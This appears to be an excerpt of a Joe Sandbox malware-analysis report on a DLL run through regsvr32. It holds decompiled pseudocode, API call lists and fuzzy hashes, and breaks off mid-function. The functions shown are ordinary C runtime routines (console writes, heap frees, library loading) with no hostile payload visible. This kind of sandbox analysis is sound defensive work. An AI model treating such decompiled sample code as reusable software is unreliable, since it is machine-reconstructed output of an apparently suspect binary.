    • Snapshot File: hcaresult_2_2_6e9e0000_regsvr32.jbxd
    Similarity
    • API ID: _free$ErrorFreeHeapLast
    • String ID:
    • API String ID: 776569668-0
    • Opcode ID: 874b33ac7b038135fd7b901955dcf2b1bab23e57214b65b97104ea2abfc53616
    • Instruction ID: c168b81bb5a8b06410f6969c40084f1bfc967045f21e6affc3b2ccb5acc2d7b1
    • Opcode Fuzzy Hash: 874b33ac7b038135fd7b901955dcf2b1bab23e57214b65b97104ea2abfc53616
    • Instruction Fuzzy Hash: 8F119AB1580B08FBD621ABF1CC06FDB779CAFA2308F400D14A2A9A7152CB64E4498FC0
    Uniqueness

    Uniqueness Score: -1.00%

    C-Code - Quality: 84%
    			E6E9F0921(void* __eflags, intOrPtr _a4, signed int _a8, signed char* _a12, intOrPtr _a16) {
    				signed int _v8;
    				char _v16;
    				char _v23;
    				char _v24;
    				void _v32;
    				signed int _v33;
    				signed char _v40;
    				signed int _v44;
    				intOrPtr _v48;
    				char _v51;
    				void _v52;
    				long _v56;
    				char _v60;
    				intOrPtr _v68;
    				char _v72;
    				struct _OVERLAPPED* _v76;
    				signed char _v80;
    				signed int _v84;
    				signed int _v88;
    				char _v92;
    				intOrPtr _v96;
    				long _v100;
    				signed char* _v104;
    				signed char* _v108;
    				void* _v112;
    				intOrPtr _v116;
    				char _v120;
    				int _v124;
    				intOrPtr _v128;
    				struct _OVERLAPPED* _v132;
    				struct _OVERLAPPED* _v136;
    				struct _OVERLAPPED* _v140;
    				struct _OVERLAPPED* _v144;
    				void* __ebx;
    				void* __edi;
    				void* __esi;
    				signed int _t170;
    				signed int _t172;
    				int _t178;
    				intOrPtr _t183;
    				intOrPtr _t186;
    				void* _t188;
    				void* _t190;
    				long _t193;
    				void _t198;
    				signed char* _t202;
    				void* _t206;
    				struct _OVERLAPPED* _t211;
    				void* _t220;
    				long _t224;
    				intOrPtr _t225;
    				char _t227;
    				void* _t237;
    				signed int _t242;
    				intOrPtr _t245;
    				signed int _t248;
    				signed int _t249;
    				signed int _t251;
    				intOrPtr _t253;
    				void* _t259;
    				intOrPtr _t260;
    				signed int _t261;
    				signed char _t264;
    				intOrPtr _t267;
    				signed char* _t269;
    				signed int _t272;
    				signed int _t273;
    				signed int _t277;
    				signed int _t278;
    				intOrPtr _t279;
    				signed int _t280;
    				struct _OVERLAPPED* _t282;
    				struct _OVERLAPPED* _t284;
    				signed int _t285;
    				void* _t286;
    				void* _t287;
    
    				_t170 =  *0x6e9fc024; // 0x45ebcfb3
    				_v8 = _t170 ^ _t285;
    				_t172 = _a8;
    				_t264 = _t172 >> 6;
    				_t242 = (_t172 & 0x0000003f) * 0x38;
    				_t269 = _a12;
    				_v108 = _t269;
    				_v80 = _t264;
    				_v112 =  *((intOrPtr*)(_t242 +  *((intOrPtr*)(0x6e9fd638 + _t264 * 4)) + 0x18));
    				_v44 = _t242;
    				_v96 = _a16 + _t269;
    				_t178 = GetConsoleOutputCP();
    				_t241 = 0;
    				_v124 = _t178;
    				E6E9EC407( &_v72, _t264, 0);
    				_t273 = 0;
    				_v92 = 0;
    				_v88 = 0;
    				_v84 = 0;
    				_t245 =  *((intOrPtr*)(_v68 + 8));
    				_v128 = _t245;
    				_v104 = _t269;
    				if(_t269 >= _v96) {
    					L48:
    					__eflags = _v60 - _t241;
    				} else {
    					while(1) {
    						_t248 = _v44;
    						_v51 =  *_t269;
    						_v76 = _t241;
    						_v40 = 1;
    						_t186 =  *((intOrPtr*)(0x6e9fd638 + _v80 * 4));
    						_v48 = _t186;
    						if(_t245 != 0xfde9) {
    							goto L19;
    						}
    						_t211 = _t241;
    						_t267 = _v48 + 0x2e + _t248;
    						_v116 = _t267;
    						while( *((intOrPtr*)(_t267 + _t211)) != _t241) {
    							_t211 =  &(_t211->Internal);
    							if(_t211 < 5) {
    								continue;
    							}
    							break;
    						}
    						_t264 = _v96 - _t269;
    						_v40 = _t211;
    						if(_t211 <= 0) {
    							_t72 = ( *_t269 & 0x000000ff) + 0x6e9fc760; // 0x0
    							_t253 =  *_t72 + 1;
    							_v48 = _t253;
    							__eflags = _t253 - _t264;
    							if(_t253 > _t264) {
    								__eflags = _t264;
    								if(_t264 <= 0) {
    									goto L40;
    								} else {
    									_t278 = _v44;
    									do {
    										 *((char*)( *((intOrPtr*)(0x6e9fd638 + _v80 * 4)) + _t278 + _t241 + 0x2e)) =  *((intOrPtr*)(_t241 + _t269));
    										_t241 =  &(_t241->Internal);
    										__eflags = _t241 - _t264;
    									} while (_t241 < _t264);
    									goto L39;
    								}
    							} else {
    								_v144 = _t241;
    								__eflags = _t253 - 4;
    								_v140 = _t241;
    								_v56 = _t269;
    								_v40 = (_t253 == 4) + 1;
    								_t220 = E6E9F169D( &_v144,  &_v76,  &_v56, (_t253 == 4) + 1,  &_v144);
    								_t287 = _t286 + 0x10;
    								__eflags = _t220 - 0xffffffff;
    								if(_t220 == 0xffffffff) {
    									goto L48;
    								} else {
    									_t279 = _v48;
    									goto L18;
    								}
    							}
    						} else {
    							_t224 =  *((char*)(( *(_t248 + _v48 + 0x2e) & 0x000000ff) + 0x6e9fc760)) + 1;
    							_v56 = _t224;
    							_t225 = _t224 - _v40;
    							_v48 = _t225;
    							if(_t225 > _t264) {
    								__eflags = _t264;
    								if(_t264 > 0) {
    									_t280 = _t248;
    									do {
    										_t227 =  *((intOrPtr*)(_t241 + _t269));
    										_t259 =  *((intOrPtr*)(0x6e9fd638 + _v80 * 4)) + _t280 + _t241;
    										_t241 =  &(_t241->Internal);
    										 *((char*)(_t259 + _v40 + 0x2e)) = _t227;
    										_t280 = _v44;
    										__eflags = _t241 - _t264;
    									} while (_t241 < _t264);
    									L39:
    									_t273 = _v88;
    								}
    								L40:
    								_t277 = _t273 + _t264;
    								__eflags = _t277;
    								L41:
    								__eflags = _v60;
    								_v88 = _t277;
    							} else {
    								_t264 = _v40;
    								_t282 = _t241;
    								_t260 = _v116;
    								do {
    									 *((char*)(_t285 + _t282 - 0xc)) =  *((intOrPtr*)(_t260 + _t282));
    									_t282 =  &(_t282->Internal);
    								} while (_t282 < _t264);
    								_t283 = _v48;
    								_t261 = _v44;
    								if(_v48 > 0) {
    									E6E9E9DB0( &_v16 + _t264, _t269, _t283);
    									_t261 = _v44;
    									_t286 = _t286 + 0xc;
    									_t264 = _v40;
    								}
    								_t272 = _v80;
    								_t284 = _t241;
    								do {
    									 *( *((intOrPtr*)(0x6e9fd638 + _t272 * 4)) + _t261 + _t284 + 0x2e) = _t241;
    									_t284 =  &(_t284->Internal);
    								} while (_t284 < _t264);
    								_t269 = _v104;
    								_t279 = _v48;
    								_v120 =  &_v16;
    								_v136 = _t241;
    								_v132 = _t241;
    								_v40 = (_v56 == 4) + 1;
    								_t237 = E6E9F169D( &_v136,  &_v76,  &_v120, (_v56 == 4) + 1,  &_v136);
    								_t287 = _t286 + 0x10;
    								if(_t237 == 0xffffffff) {
    									goto L48;
    								} else {
    									L18:
    									_t269 = _t269 - 1 + _t279;
    									L27:
    									_t269 =  &(_t269[1]);
    									_v104 = _t269;
    									_t193 = E6E9EFCA5(_v124, _t241,  &_v76, _v40,  &_v32, 5, _t241, _t241);
    									_t286 = _t287 + 0x20;
    									_v56 = _t193;
    									if(_t193 == 0) {
    										goto L48;
    									} else {
    										if(WriteFile(_v112,  &_v32, _t193,  &_v100, _t241) == 0) {
    											L47:
    											_v92 = GetLastError();
    											goto L48;
    										} else {
    											_t273 = _v84 - _v108 + _t269;
    											_v88 = _t273;
    											if(_v100 < _v56) {
    												goto L48;
    											} else {
    												if(_v51 != 0xa) {
    													L34:
    													if(_t269 >= _v96) {
    														goto L48;
    													} else {
    														_t245 = _v128;
    														continue;
    													}
    												} else {
    													_t198 = 0xd;
    													_v52 = _t198;
    													if(WriteFile(_v112,  &_v52, 1,  &_v100, _t241) == 0) {
    														goto L47;
    													} else {
    														if(_v100 < 1) {
    															goto L48;
    														} else {
    															_v84 = _v84 + 1;
    															_t273 = _t273 + 1;
    															_v88 = _t273;
    															goto L34;
    														}
    													}
    												}
    											}
    										}
    									}
    								}
    							}
    						}
    						goto L49;
    						L19:
    						_t264 =  *((intOrPtr*)(_t248 + _t186 + 0x2d));
    						__eflags = _t264 & 0x00000004;
    						if((_t264 & 0x00000004) == 0) {
    							_v33 =  *_t269;
    							_t188 = E6E9F02C6(_t264);
    							_t249 = _v33 & 0x000000ff;
    							__eflags =  *((intOrPtr*)(_t188 + _t249 * 2)) - _t241;
    							if( *((intOrPtr*)(_t188 + _t249 * 2)) >= _t241) {
    								_push(1);
    								_push(_t269);
    								goto L26;
    							} else {
    								_t100 =  &(_t269[1]); // 0x1
    								_t202 = _t100;
    								_v56 = _t202;
    								__eflags = _t202 - _v96;
    								if(_t202 >= _v96) {
    									_t264 = _v80;
    									_t251 = _v44;
    									_t241 = _v33;
    									 *((char*)(_t251 +  *((intOrPtr*)(0x6e9fd638 + _t264 * 4)) + 0x2e)) = _v33;
    									 *(_t251 +  *((intOrPtr*)(0x6e9fd638 + _t264 * 4)) + 0x2d) =  *(_t251 +  *((intOrPtr*)(0x6e9fd638 + _t264 * 4)) + 0x2d) | 0x00000004;
    									_t277 = _t273 + 1;
    									goto L41;
    								} else {
    									_t206 = E6E9EE7D9( &_v76, _t269, 2);
    									_t287 = _t286 + 0xc;
    									__eflags = _t206 - 0xffffffff;
    									if(_t206 == 0xffffffff) {
    										goto L48;
    									} else {
    										_t269 = _v56;
    										goto L27;
    									}
    								}
    							}
    						} else {
    							_t264 = _t264 & 0x000000fb;
    							_v24 =  *((intOrPtr*)(_t248 + _t186 + 0x2e));
    							_v23 =  *_t269;
    							_push(2);
    							 *(_t248 + _v48 + 0x2d) = _t264;
    							_push( &_v24);
    							L26:
    							_push( &_v76);
    							_t190 = E6E9EE7D9();
    							_t287 = _t286 + 0xc;
    							__eflags = _t190 - 0xffffffff;
    							if(_t190 == 0xffffffff) {
    								goto L48;
    							} else {
    								goto L27;
    							}
    						}
    						goto L49;
    					}
    				}
    				L49:
    				if(__eflags != 0) {
    					_t183 = _v72;
    					_t165 = _t183 + 0x350;
    					 *_t165 =  *(_t183 + 0x350) & 0xfffffffd;
    					__eflags =  *_t165;
    				}
    				__eflags = _v8 ^ _t285;
    				asm("movsd");
    				asm("movsd");
    				asm("movsd");
    				return E6E9E9ADF(_a4, _t241, _v8 ^ _t285, _t264, _a4,  &_v92);
    			}

    APIs
    • GetConsoleOutputCP.KERNEL32(?,00000001,?), ref: 6E9F0969
    • __fassign.LIBCMT ref: 6E9F0B4E
    • __fassign.LIBCMT ref: 6E9F0B6B
    • WriteFile.KERNEL32(?,6E9EE286,00000000,?,00000000,?,?,?,?,?,?,?,?,?,?,00000000), ref: 6E9F0BB3
    • WriteFile.KERNEL32(?,?,00000001,?,00000000), ref: 6E9F0BF3
    • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,00000000), ref: 6E9F0C9B
    Memory Dump Source
    • Source File: 00000002.00000002.437552917.000000006E9E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 6E9E0000, based on PE: true
    • Associated: 00000002.00000002.437545366.000000006E9E0000.00000002.00000001.01000000.00000003.sdmp
    • Associated: 00000002.00000002.437578674.000000006E9F5000.00000002.00000001.01000000.00000003.sdmp
    • Associated: 00000002.00000002.437594395.000000006E9FC000.00000004.00000001.01000000.00000003.sdmp
    • Associated: 00000002.00000002.437601619.000000006E9FE000.00000002.00000001.01000000.00000003.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_2_2_6e9e0000_regsvr32.jbxd
    Similarity
    • API ID: FileWrite__fassign$ConsoleErrorLastOutput
    • String ID:
    • API String ID: 1735259414-0
    • Opcode ID: b833e4030bc1bfa1df609b419c7c8dabe70ec27cc256bebc99252f4372e43a6c
    • Instruction ID: 3eae60b5d78e60e4841c69526ff082b3065ccf398e2371a6c8a70d72337de221
    • Opcode Fuzzy Hash: b833e4030bc1bfa1df609b419c7c8dabe70ec27cc256bebc99252f4372e43a6c
    • Instruction Fuzzy Hash: DAC18A75D04299DFDB01CFE8C9909EDBBB9AF49314F28416AE859BB341E231D942CF60
    Uniqueness

    Uniqueness Score: -1.00%

    C-Code - Quality: 85%
    			E6E9EAD94(void* __ecx) {
    				void* _t4;
    				void* _t8;
    				void* _t11;
    				void* _t13;
    				void* _t14;
    				void* _t18;
    				void* _t23;
    				long _t24;
    				void* _t27;
    
    				_t13 = __ecx;
    				if( *0x6e9fc030 != 0xffffffff) {
    					_t24 = GetLastError();
    					_t11 = E6E9EBF60(_t13, __eflags,  *0x6e9fc030);
    					_t14 = _t23;
    					__eflags = _t11 - 0xffffffff;
    					if(_t11 == 0xffffffff) {
    						L5:
    						_t11 = 0;
    					} else {
    						__eflags = _t11;
    						if(__eflags == 0) {
    							_t4 = E6E9EBF9B(_t14, __eflags,  *0x6e9fc030, 0xffffffff);
    							__eflags = _t4;
    							if(_t4 != 0) {
    								_push(0x28);
    								_t27 = E6E9ED58B();
    								_t18 = 1;
    								__eflags = _t27;
    								if(__eflags == 0) {
    									L8:
    									_t11 = 0;
    									E6E9EBF9B(_t18, __eflags,  *0x6e9fc030, 0);
    								} else {
    									_t8 = E6E9EBF9B(_t18, __eflags,  *0x6e9fc030, _t27);
    									_pop(_t18);
    									__eflags = _t8;
    									if(__eflags != 0) {
    										_t11 = _t27;
    										_t27 = 0;
    										__eflags = 0;
    									} else {
    										goto L8;
    									}
    								}
    								E6E9EC2B0(_t27);
    							} else {
    								goto L5;
    							}
    						}
    					}
    					SetLastError(_t24);
    					return _t11;
    				} else {
    					return 0;
    				}
    			}

    APIs
    • GetLastError.KERNEL32(00000001,?,6E9EA952,6E9E8F01,6E9E92CE,?,6E9E9506,?,00000001,?,?,00000001,?,6E9FA618,0000000C,6E9E95FF), ref: 6E9EADA2
    • ___vcrt_FlsGetValue.LIBVCRUNTIME ref: 6E9EADB0
    • ___vcrt_FlsSetValue.LIBVCRUNTIME ref: 6E9EADC9
    • SetLastError.KERNEL32(00000000,6E9E9506,?,00000001,?,?,00000001,?,6E9FA618,0000000C,6E9E95FF,?,00000001,?), ref: 6E9EAE1B
    Memory Dump Source
    • Source File: 00000002.00000002.437552917.000000006E9E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 6E9E0000, based on PE: true
    • Associated: 00000002.00000002.437545366.000000006E9E0000.00000002.00000001.01000000.00000003.sdmp
    • Associated: 00000002.00000002.437578674.000000006E9F5000.00000002.00000001.01000000.00000003.sdmp
    • Associated: 00000002.00000002.437594395.000000006E9FC000.00000004.00000001.01000000.00000003.sdmp
    • Associated: 00000002.00000002.437601619.000000006E9FE000.00000002.00000001.01000000.00000003.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_2_2_6e9e0000_regsvr32.jbxd
    Similarity
    • API ID: ErrorLastValue___vcrt_
    • String ID:
    • API String ID: 3852720340-0
    • Opcode ID: f644cac3cde2138cc56ac671bdaa34447043f11cb7d0eef2f3cb032f4cc9b7d3
    • Instruction ID: a08299f0d3fe9d099f2b7ba85a068d092dde37482075a5219591980b5d139d1b
    • Opcode Fuzzy Hash: f644cac3cde2138cc56ac671bdaa34447043f11cb7d0eef2f3cb032f4cc9b7d3
    • Instruction Fuzzy Hash: A401687211DB125EAB1719F47C8064B2B7CEF62A7D320062DF720598E4EF91C8425D48
    Uniqueness

    Uniqueness Score: -1.00%

    C-Code - Quality: 100%
    			E6E9EF217(intOrPtr* _a4, intOrPtr _a8, intOrPtr _a16) {
    				intOrPtr _t14;
    				intOrPtr _t15;
    				intOrPtr _t17;
    				intOrPtr _t36;
    				intOrPtr* _t38;
    				intOrPtr _t39;
    
    				_t38 = _a4;
    				if(_t38 != 0) {
    					__eflags =  *_t38;
    					if( *_t38 != 0) {
    						_t14 = E6E9EFCA5(_a16, 0, _t38, 0xffffffff, 0, 0, 0, 0);
    						__eflags = _t14;
    						if(__eflags != 0) {
    							_t36 = _a8;
    							__eflags = _t14 -  *((intOrPtr*)(_t36 + 0xc));
    							if(_t14 <=  *((intOrPtr*)(_t36 + 0xc))) {
    								L10:
    								_t15 = E6E9EFCA5(_a16, 0, _t38, 0xffffffff,  *((intOrPtr*)(_t36 + 8)),  *((intOrPtr*)(_t36 + 0xc)), 0, 0);
    								__eflags = _t15;
    								if(__eflags != 0) {
    									 *((intOrPtr*)(_t36 + 0x10)) = _t15 - 1;
    									_t17 = 0;
    									__eflags = 0;
    								} else {
    									E6E9ED437(GetLastError());
    									_t17 =  *((intOrPtr*)(E6E9ED46D(__eflags)));
    								}
    								L13:
    								L14:
    								return _t17;
    							}
    							_t17 = E6E9EF2DE(_t36, _t14);
    							__eflags = _t17;
    							if(_t17 != 0) {
    								goto L13;
    							}
    							goto L10;
    						}
    						E6E9ED437(GetLastError());
    						_t17 =  *((intOrPtr*)(E6E9ED46D(__eflags)));
    						goto L14;
    					}
    					_t39 = _a8;
    					__eflags =  *((intOrPtr*)(_t39 + 0xc));
    					if( *((intOrPtr*)(_t39 + 0xc)) != 0) {
    						L5:
    						 *((char*)( *((intOrPtr*)(_t39 + 8)))) = 0;
    						_t17 = 0;
    						 *((intOrPtr*)(_t39 + 0x10)) = 0;
    						goto L14;
    					}
    					_t17 = E6E9EF2DE(_t39, 1);
    					__eflags = _t17;
    					if(_t17 != 0) {
    						goto L14;
    					}
    					goto L5;
    				}
    				E6E9EF305(_a8);
    				return 0;
    			}

    Strings
    • C:\Windows\SysWOW64\regsvr32.exe, xrefs: 6E9EF21C
    Memory Dump Source
    • Source File: 00000002.00000002.437552917.000000006E9E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 6E9E0000, based on PE: true
    • Associated: 00000002.00000002.437545366.000000006E9E0000.00000002.00000001.01000000.00000003.sdmp
    • Associated: 00000002.00000002.437578674.000000006E9F5000.00000002.00000001.01000000.00000003.sdmp
    • Associated: 00000002.00000002.437594395.000000006E9FC000.00000004.00000001.01000000.00000003.sdmp
    • Associated: 00000002.00000002.437601619.000000006E9FE000.00000002.00000001.01000000.00000003.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_2_2_6e9e0000_regsvr32.jbxd
    Similarity
    • API ID:
    • String ID: C:\Windows\SysWOW64\regsvr32.exe
    • API String ID: 0-3922119987
    • Opcode ID: 131329eb8816c7cee174bc609df7efb85e8eabe30fe74ab0ba29b6c91733c7a7
    • Instruction ID: b0995af1a6d7e798c17c290bf85a6399c1d5a9b62cb3d140d595492cf179ea5a
    • Opcode Fuzzy Hash: 131329eb8816c7cee174bc609df7efb85e8eabe30fe74ab0ba29b6c91733c7a7
    • Instruction Fuzzy Hash: 4221A175604605AFA7029FF5AC40D86776CEF9136C7208916EA3996F80E731EC008EA0
    Uniqueness

    Uniqueness Score: -1.00%

    C-Code - Quality: 100%
    			E6E9EBE07(void* __ecx, signed int* _a4, intOrPtr _a8) {
    				WCHAR* _v8;
    				signed int _t11;
    				WCHAR* _t12;
    				struct HINSTANCE__* _t16;
    				struct HINSTANCE__* _t18;
    				signed int* _t22;
    				signed int* _t26;
    				struct HINSTANCE__* _t29;
    				WCHAR* _t31;
    				void* _t32;
    
    				_t26 = _a4;
    				while(_t26 != _a8) {
    					_t11 =  *_t26;
    					_t22 = 0x6e9fd3ec + _t11 * 4;
    					_t29 =  *_t22;
    					if(_t29 == 0) {
    						_t12 =  *(0x6e9f5e38 + _t11 * 4);
    						_v8 = _t12;
    						_t29 = LoadLibraryExW(_t12, 0, 0x800);
    						if(_t29 != 0) {
    							L13:
    							 *_t22 = _t29;
    							if( *_t22 != 0) {
    								FreeLibrary(_t29);
    							}
    							L15:
    							_t16 = _t29;
    							L12:
    							return _t16;
    						}
    						_t18 = GetLastError();
    						if(_t18 != 0x57) {
    							L8:
    							 *_t22 = _t18 | 0xffffffff;
    							L9:
    							_t26 =  &(_t26[1]);
    							continue;
    						}
    						_t31 = _v8;
    						_t18 = E6E9ED618(_t31, L"api-ms-", 7);
    						_t32 = _t32 + 0xc;
    						if(_t18 == 0) {
    							goto L8;
    						}
    						_t18 = LoadLibraryExW(_t31, 0, 0);
    						_t29 = _t18;
    						if(_t29 != 0) {
    							goto L13;
    						}
    						goto L8;
    					}
    					if(_t29 != 0xffffffff) {
    						goto L15;
    					}
    					goto L9;
    				}
    				_t16 = 0;
    				goto L12;
    			}

    APIs
    • FreeLibrary.KERNEL32(00000000,?,?,6E9EBEC8,00000000,?,00000001,00000000,?,6E9EBF3F,00000001,FlsFree,6E9F5EF4,FlsFree,00000000), ref: 6E9EBE97
    Strings
    Memory Dump Source
    • Source File: 00000002.00000002.437552917.000000006E9E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 6E9E0000, based on PE: true
    • Associated: 00000002.00000002.437545366.000000006E9E0000.00000002.00000001.01000000.00000003.sdmp
    • Associated: 00000002.00000002.437578674.000000006E9F5000.00000002.00000001.01000000.00000003.sdmp
    • Associated: 00000002.00000002.437594395.000000006E9FC000.00000004.00000001.01000000.00000003.sdmp
    • Associated: 00000002.00000002.437601619.000000006E9FE000.00000002.00000001.01000000.00000003.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_2_2_6e9e0000_regsvr32.jbxd
    Similarity
    • API ID: FreeLibrary
    • String ID: api-ms-
    • API String ID: 3664257935-2084034818
    • Opcode ID: b2c7625d1bfe89fb478ca0a88502f0e83c0b679aa96f6a4d2351191b6a295008
    • Instruction ID: 5f3587cbcc2c5801bae0dc8d3c262c3b49f641da6bc8ce5ea98df00014e845f3
    • Opcode Fuzzy Hash: b2c7625d1bfe89fb478ca0a88502f0e83c0b679aa96f6a4d2351191b6a295008
    • Instruction Fuzzy Hash: B111A732A45B21BBDB734AA8AC54B4D37B8AF02760F154554FB15E7688E760ED008ED0
    Uniqueness

    Uniqueness Score: -1.00%

    C-Code - Quality: 25%
    			E6E9EC8EA(void* __ecx, intOrPtr _a4) {
    				signed int _v8;
    				_Unknown_base(*)()* _t8;
    				_Unknown_base(*)()* _t14;
    
    				_v8 = _v8 & 0x00000000;
    				_t8 =  &_v8;
    				__imp__GetModuleHandleExW(0, L"mscoree.dll", _t8, __ecx);
    				if(_t8 != 0) {
    					_t8 = GetProcAddress(_v8, "CorExitProcess");
    					_t14 = _t8;
    					if(_t14 != 0) {
    						 *0x6e9f51b8(_a4);
    						_t8 =  *_t14();
    					}
    				}
    				if(_v8 != 0) {
    					return FreeLibrary(_v8);
    				}
    				return _t8;
    			}

    APIs
    • GetModuleHandleExW.KERNEL32(00000000,mscoree.dll,00000000,?,?,6E9EC89C,?,?,6E9EC864,?,00000001,?), ref: 6E9EC8FF
    • GetProcAddress.KERNEL32(00000000,CorExitProcess), ref: 6E9EC912
    • FreeLibrary.KERNEL32(00000000,?,?,6E9EC89C,?,?,6E9EC864,?,00000001,?), ref: 6E9EC935
    Strings
    Memory Dump Source
    • Source File: 00000002.00000002.437552917.000000006E9E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 6E9E0000, based on PE: true
    • Associated: 00000002.00000002.437545366.000000006E9E0000.00000002.00000001.01000000.00000003.sdmp
    • Associated: 00000002.00000002.437578674.000000006E9F5000.00000002.00000001.01000000.00000003.sdmp
    • Associated: 00000002.00000002.437594395.000000006E9FC000.00000004.00000001.01000000.00000003.sdmp
    • Associated: 00000002.00000002.437601619.000000006E9FE000.00000002.00000001.01000000.00000003.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_2_2_6e9e0000_regsvr32.jbxd
    Similarity
    • API ID: AddressFreeHandleLibraryModuleProc
    • String ID: CorExitProcess$mscoree.dll
    • API String ID: 4061214504-1276376045
    • Opcode ID: 03c6f88bb5767ad83f70285aef151ba45498a54cc0f19bd6e0f6c72f5ca8aaa3
    • Instruction ID: af51d2082a6820cd2bb1570d1c396cdb3afb29179ce201945b192d02d88be5bd
    • Opcode Fuzzy Hash: 03c6f88bb5767ad83f70285aef151ba45498a54cc0f19bd6e0f6c72f5ca8aaa3
    • Instruction Fuzzy Hash: 9BF08C30605619FBDF02AB91DC19B9E7FAAEF49759F108060F942A5150CB30DE41DF90
    Uniqueness

    Uniqueness Score: -1.00%

    C-Code - Quality: 100%
    			E6E9F190B(intOrPtr* _a4) {
    				intOrPtr _t6;
    				intOrPtr* _t21;
    				void* _t23;
    				void* _t24;
    				void* _t25;
    				void* _t26;
    				void* _t27;
    
    				_t21 = _a4;
    				if(_t21 != 0) {
    					_t23 =  *_t21 -  *0x6e9fc708; // 0x6e9fc758
    					if(_t23 != 0) {
    						E6E9EDC0E(_t7);
    					}
    					_t24 =  *((intOrPtr*)(_t21 + 4)) -  *0x6e9fc70c; // 0x6e9fd9f4
    					if(_t24 != 0) {
    						E6E9EDC0E(_t8);
    					}
    					_t25 =  *((intOrPtr*)(_t21 + 8)) -  *0x6e9fc710; // 0x6e9fd9f4
    					if(_t25 != 0) {
    						E6E9EDC0E(_t9);
    					}
    					_t26 =  *((intOrPtr*)(_t21 + 0x30)) -  *0x6e9fc738; // 0x6e9fc75c
    					if(_t26 != 0) {
    						E6E9EDC0E(_t10);
    					}
    					_t6 =  *((intOrPtr*)(_t21 + 0x34));
    					_t27 = _t6 -  *0x6e9fc73c; // 0x6e9fd9f8
    					if(_t27 != 0) {
    						return E6E9EDC0E(_t6);
    					}
    				}
    				return _t6;
    			}

    APIs
    • _free.LIBCMT ref: 6E9F1923
      • Part of subcall function 6E9EDC0E: RtlFreeHeap.NTDLL(00000000,00000000,?,6E9F199E,?,00000000,?,?,?,6E9F19C5,?,00000007,?,?,6E9F04FE,?), ref: 6E9EDC24
      • Part of subcall function 6E9EDC0E: GetLastError.KERNEL32(?,?,6E9F199E,?,00000000,?,?,?,6E9F19C5,?,00000007,?,?,6E9F04FE,?,?), ref: 6E9EDC36
    • _free.LIBCMT ref: 6E9F1935
    • _free.LIBCMT ref: 6E9F1947
    • _free.LIBCMT ref: 6E9F1959
    • _free.LIBCMT ref: 6E9F196B
    Memory Dump Source
    • Source File: 00000002.00000002.437552917.000000006E9E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 6E9E0000, based on PE: true
    • Associated: 00000002.00000002.437545366.000000006E9E0000.00000002.00000001.01000000.00000003.sdmp
    • Associated: 00000002.00000002.437578674.000000006E9F5000.00000002.00000001.01000000.00000003.sdmp
    • Associated: 00000002.00000002.437594395.000000006E9FC000.00000004.00000001.01000000.00000003.sdmp
    • Associated: 00000002.00000002.437601619.000000006E9FE000.00000002.00000001.01000000.00000003.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_2_2_6e9e0000_regsvr32.jbxd
    Similarity
    • API ID: _free$ErrorFreeHeapLast
    • String ID:
    • API String ID: 776569668-0
    • Opcode ID: ea2682037e8547f81ff7f47179c2d408bf4c85a9fc6ab5738721c6f8cfbeda70
    • Instruction ID: ac3513a494e45ed96d28671c8c487141a8634faf1fa6f909da9fcd4d07e118ec
    • Opcode Fuzzy Hash: ea2682037e8547f81ff7f47179c2d408bf4c85a9fc6ab5738721c6f8cfbeda70
    • Instruction Fuzzy Hash: 68F06D71948605DB8A40CAE9F292C5B73EDEF82760B604C05F165DBA01CB30F8C48FE8
    Uniqueness

    Uniqueness Score: -1.00%

    C-Code - Quality: 80%
    			E6E9EEB9B(void* __esi, signed int* _a4, signed int _a8, intOrPtr _a12) {
    				intOrPtr _v0;
    				signed int _v6;
    				signed int _v8;
    				signed int _v12;
    				signed int _v16;
    				intOrPtr _v20;
    				intOrPtr _v24;
    				signed int _v28;
    				signed int _v32;
    				signed int _v36;
    				signed int _v40;
    				intOrPtr* _v72;
    				intOrPtr* _v104;
    				intOrPtr* _v108;
    				intOrPtr _v112;
    				signed int _v124;
    				struct _WIN32_FIND_DATAW _v608;
    				char _v609;
    				intOrPtr* _v616;
    				union _FINDEX_INFO_LEVELS _v620;
    				union _FINDEX_INFO_LEVELS _v624;
    				union _FINDEX_INFO_LEVELS _v628;
    				signed int _v632;
    				union _FINDEX_INFO_LEVELS _v636;
    				union _FINDEX_INFO_LEVELS _v640;
    				signed int _v644;
    				signed int _v648;
    				union _FINDEX_INFO_LEVELS _v652;
    				union _FINDEX_INFO_LEVELS _v656;
    				union _FINDEX_INFO_LEVELS _v660;
    				union _FINDEX_INFO_LEVELS _v664;
    				signed int _v668;
    				union _FINDEX_INFO_LEVELS _v672;
    				union _FINDEX_INFO_LEVELS _v676;
    				intOrPtr _v724;
    				void* __ebx;
    				void* __edi;
    				intOrPtr* _t131;
    				signed int _t132;
    				signed int _t134;
    				signed int _t139;
    				signed int _t140;
    				intOrPtr* _t150;
    				signed int _t152;
    				intOrPtr _t153;
    				signed int _t157;
    				signed int _t159;
    				signed int _t164;
    				signed int _t166;
    				char _t168;
    				signed char _t169;
    				signed int _t175;
    				union _FINDEX_INFO_LEVELS _t179;
    				signed int _t185;
    				union _FINDEX_INFO_LEVELS _t188;
    				intOrPtr* _t196;
    				signed int _t199;
    				intOrPtr _t204;
    				signed int _t206;
    				signed int _t209;
    				signed int _t211;
    				signed int _t212;
    				signed int _t213;
    				signed int _t215;
    				signed int _t217;
    				signed int _t218;
    				signed int* _t219;
    				signed int _t222;
    				void* _t225;
    				union _FINDEX_INFO_LEVELS _t226;
    				void* _t227;
    				intOrPtr _t229;
    				signed int _t232;
    				signed int _t233;
    				signed int _t234;
    				signed int _t236;
    				intOrPtr* _t239;
    				signed int _t241;
    				intOrPtr* _t244;
    				signed int _t249;
    				signed int _t255;
    				signed int _t257;
    				signed int _t263;
    				intOrPtr* _t264;
    				signed int _t272;
    				signed int _t274;
    				intOrPtr* _t275;
    				void* _t277;
    				signed int _t280;
    				signed int _t283;
    				signed int _t285;
    				intOrPtr _t287;
    				void* _t288;
